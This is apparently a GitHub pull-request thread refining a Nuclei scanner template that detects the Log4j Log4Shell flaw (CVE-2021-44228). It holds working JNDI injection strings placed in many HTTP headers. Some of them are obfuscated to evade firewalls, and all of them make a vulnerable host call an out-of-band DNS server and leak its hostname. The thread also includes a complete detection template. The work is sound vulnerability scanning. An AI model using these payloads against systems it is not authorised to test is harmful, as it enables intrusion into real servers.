Updated CVE-2021-44228 with most common vulnerable headers

[Anon-Artist]

Template / PR Information

The template is updated with most common headers which can be vulnerable to CVE-2021-44228 including X-Api-Version Header, X-Forwarded Headers etc..

• Updated CVE-2021-44228
• References: https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell

These headers are collected from above blog in Detecting the Vulnerability part

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[Anon-Artist]

Added more headers

[ErwinGeirnaert]

Hi, there is a problem with the usage of ${hostName}, should't that be {{Hostname}}?

[ehsandeep]

@ErwinGeirnaert ${hostName} is a variable name to be fetched from vulnerable systems and not related to the template.

[Anon-Artist]

I had used the same payload created by @ehsandeep only added the most common security headers.
So what changes are you proposing , or where should be the changes need.

[ErwinGeirnaert]

The JNDI exploit will download code and execute it, not the payload in the url

[ErwinGeirnaert]

I've changed it to {{Hostname}} and this results in an interaction to interactsh where the hostname that was scanned is added to the DNS request so you know which hosts are vulnerable

[ehsandeep]

@ErwinGeirnaert there are multiple ways to exploit this and pulling ${hostName} of the vulnerable system is one of them via DNS interaction.

• https://twitter.com/bugbountynights/status/1469670420702019589
• https://github.com/jas502n/Log4j2-CVE-2021-44228

[ErwinGeirnaert]

thanks @ehsandeep that is just crazy!!!

[Anon-Artist]

Thanks for fixing lint error i was busy with some other tasks

[Anon-Artist]

Hi @geeknik, All mentioned changes are made, and all checks have passed.

[Anon-Artist]

Done

[ehsandeep]

thank you for all the new header additions @Anon-Artist, we might hold this PR for some time due to a known issue in the nuclei engine - projectdiscovery/nuclei#1361 otherwise we will get multiple interactions for the same target.

[Anon-Artist]

thank you for all the new header additions @Anon-Artist, we might hold this PR for some time due to a known issue in the nuclei engine - projectdiscovery/nuclei#1361 otherwise we will get multiple interactions for the same target.

Sure @ehsandeep i will wait for to see the PR getting merged.
Thanks

[dogasantos]

@ehsandeep the current template for log4j has a hardcoded interactsh.com server in place. This will fail if we use a custom server.

      - type: regex
        part: interactsh_request
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interact(\.sh|sh\.com)'

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interact(\.sh|sh\.com)'   # Extract ${hostName}

the {interactsh-url} will work in regex field to make it fully compatible with any private intertactsh server?

I guess not, { } are reserved/valid. SO must patch locally to match the private server in the meantime

[ehsandeep]

@dogasantos please see the discussion here - #3330

[xuchaoa]

include same header-key? maybe del one ?

[Anon-Artist]

Avoided duplication suggested by @xuchaoa

[Anon-Artist]

Hi @ehsandeep i had changed the regex in matchers and extractors used in the latest update v8.7.3
ie, making it compatible with self-hosted interactsh server

[meme-lord]

Another thing that could be changed with this template is adding the name of the header or position into the DNS request. This makes it easier to identify which header the vulnerability triggered in.
Like this:

        GET /?x=${jndi:ldap://${hostName}-url.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}-ua.{{interactsh-url}}}
        Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-ref.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xff.{{interactsh-url}}}
        Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-auth.{{interactsh-url}}}
        X-Api-Version: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xav.{{interactsh-url}}}
        X-Requested-With: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xrw.{{interactsh-url}}}
        X-Forwarded-Host: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xfh.{{interactsh-url}}}
        Cookie: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-cook.{{interactsh-url}}}
        Origin: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-orig.{{interactsh-url}}}
        Accept: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acpt.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xdc.{{interactsh-url}}}
        Location: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-loc.{{interactsh-url}}}
        Accept-Language: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-al.{{interactsh-url}}}
        Accept-Encoding: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-ae.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-uir.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xct.{{interactsh-url}}}
        Content-Length: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-cl.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acrm.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acrh.{{interactsh-url}}}

[0xceba]

I recommend the additional adjustments that are present in the below version:

• Fix extraction regex to match hostnames with uppercase letters.
• Standardized the payload. There's no point to include a WAF-bypass payload in the same petition as the default payload.
• Print the injection point.

id: CVE-2021-44228

info:
  name: Remote code injection in Log4j
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  tags: cve,cve2021,rce,oast,log4j

requests:
  - raw:
      - |
        GET /?x=${jndi:ldap://${hostName}.url.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

[Anon-Artist]

I recommend the additional adjustments that are present in the below version:

• Fix extraction regex to match hostnames with uppercase letters.
• Standardized the payload. There's no point to include a WAF-bypass payload in the same petition as the default payload.
• Print the injection point.

id: CVE-2021-44228

info:
  name: Remote code injection in Log4j
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  tags: cve,cve2021,rce,oast,log4j

requests:
  - raw:
      - |
        GET /?x=${jndi:ldap://${hostName}.url.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output

Sure i will do it and thanks for the detailed explanation 😀

[ehsandeep]

thank you @Anon-Artist @0xceba @meme-lord @xuchaoa for all the suggestions and changes, I've updated the PR based on the latest suggestions made by @0xceba, also @Anon-Artist as now we know which header caused the interaction, I believe we can merge this PR as well.